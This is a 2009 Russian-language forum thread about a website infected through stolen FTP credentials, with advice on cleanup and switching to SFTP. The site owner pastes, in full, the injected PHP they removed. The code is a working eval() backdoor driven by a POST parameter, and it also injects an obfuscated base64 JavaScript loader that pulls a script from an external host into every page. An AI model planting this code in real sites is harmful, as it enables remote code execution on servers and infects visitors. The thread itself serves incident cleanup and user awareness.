Фишинг-атака

[akoK]

MAM, смените пароли на ftp, проверьте компьютер с которого есть административный доступ. И перезалейте патченные файлы (js и php?).

Изменено 14 мая, 2009 пользователем akoK

[MAM]

для полного удаление пришлось еще почистить PHP файлы с данной строкой:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBhdjhUPSd2
QDYxckAyMGFAM2RAMjJTQDYzckA2OXB0QDQ1QDZlZ2luZUAyMkAyY2JAM2RAMjJWQDY1cnNpb0A2ZSgp
K
0AyMkAyY2pAM2RAMjJAMjJAMmN1QDNkQDZlYXZpQDY3YUA3NEA2ZkA3MkAyZXVzQDY1ckFANjdlbnRAM
2
JANjlANjYoKHVAMmVpbmRleE9ANjYoQDIyV2luQDIyKUAzZTApQDI2QDI2QDI4QDc1QDJlaW5ANjRlQD
c
4QDRmZihAMjJOVEAyMDZAMjIpQDNjMClAMjZAMjZAMjhANjRANmZANjN1bWVudEAyZWNvb2tpZUAyZUA
2
OW5kZXhANGZmKEAyMm1pZUA2YkAzZDFAMjIpQDNjMClAMjZAMjYodEA3OXBANjVvQDY2KHpANzJANzZ6
d
HMpQDIxQDNkQDc0eUA3MGVvQDY2KEAyMkA0MUAyMikpQDI5QDdiekA3MnZAN2FANzRzQDNkQDIyQUAyM
k
AzYkA2NUA3NmFsKEAyMmlANjYod2luZG93QDJlQDIyK2ErQDIyKWpAM2RANmErQDIyK2ErQDIyQDRkYW
p
ANmZANzJAMjIrYkAyYkA2MStAMjJANGRpbkA2ZnJAMjIrQDYyQDJiYStAMjJCQDc1QDY5QDZjZEAyMit
i
K0AyMkA2YUAzYkAyMkAyOUAzYmRANmZjdW1lbkA3NEAyZUA3N3JpQDc0ZUAyOEAyMkAzY3NANjNyaXB0
Q
DIwc0A3MmNAM2RAMmZAMmZndW1ibGFyQDJlY25AMmZyc3NAMmZAM2ZpZEAzZEAyMitqK0AyMkAzZUAzY
0
A1Y0AyZnNjcmlwdEAzZUAyMkAyOUAzYkA3ZCc7dmFyIExVQT1hdjhULnJlcGxhY2UoL0AvZywnJScpO2
V
2YWwodW5lc2NhcGUoTFVBKSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

[elz]

MAM, смените пароли на ftp, проверьте компьютер с которого есть административный доступ. И перезалейте патченные файлы (js и php?).

Простой сброс паролей не поможет. Как только пароль будет изменен - троян, следящий за фтп-менеджером передаст на удаленную машину новый пароль.

Эта зараза мне известна.

Сначала на компе поселяется троян и следит за паролями ФТП-менеджеров. Периодически отсылает эти пароли удаленному скрипту, который затем загружает вредоносный код на сайт в файлы по маске index.*, auth.* etc. Теперь маска стала достаточно широкой, так что наверное придется перепроверять все файлы.

А код загруженный на сайт сначала направляет на удаленную машину, с которой на компьютер пользователя загружается ранее описанный вирус. Вообще, судя по всему это один из троянов создающих бот-сеть.

Лечится только использованием "качественных" ФТП-менеджеров. С поддержкой SFTP. Я, на пример, использую WinSCP. Ну и естественно очистка машины. Только сначала меняете фтп клиент,а затем чистите машину.

Подробнее я написал здесь.

его видят только АВК и Nod32 (правда Нод не лечит)